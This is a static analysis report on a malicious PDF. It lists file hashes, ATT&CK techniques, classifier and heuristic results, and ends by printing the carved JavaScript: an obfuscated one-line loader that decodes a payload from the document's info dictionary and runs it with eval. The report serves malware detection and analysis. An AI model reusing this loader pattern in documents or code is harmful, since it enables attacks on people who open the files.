Malicious PDF — malware analysis report

Static analysis result for SHA-256 7b7e3ade8a54ac12…

MALICIOUS

PDF

4.5 KB Created: 2008-09-24 19:47:56 Authoring application: Adobe (via Notepad)
MD5: 3b6c92fc4a6d1e8edfaaf13ba4b92973 SHA-1: 00ed9fbe46b2398afea27ff0a4290b4030d51bbd SHA-256: 7b7e3ade8a54ac12c0bd1e6ec0e49c625ab96c6992a19325cc714e4a6844f67d
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that utilizes an eval() call on obfuscated data derived from the document's info dictionary. This pattern is indicative of an exploit attempting to execute arbitrary code, likely to download and run a secondary malicious payload. The ML classifier strongly suggests maliciousness, and the JavaScript exploit cluster heuristic confirms the presence of exploit code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
b40c78d184ee13f0511048d2d8bd834e2a5f2c076764719d62802f4f2f1eea7c
pdf-javascript-stream PDF /JS object 6 at offset 0xF55 136 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
KF7=24;if(app)KF7='';gPv=this;Iik6=unescape;g48j=gPv.info;KF7=Iik6('%'+KF7);yFNhv=g48j.Trailer.replace(/([A-Z])/g,KF7);eval(Iik6(yFNhv))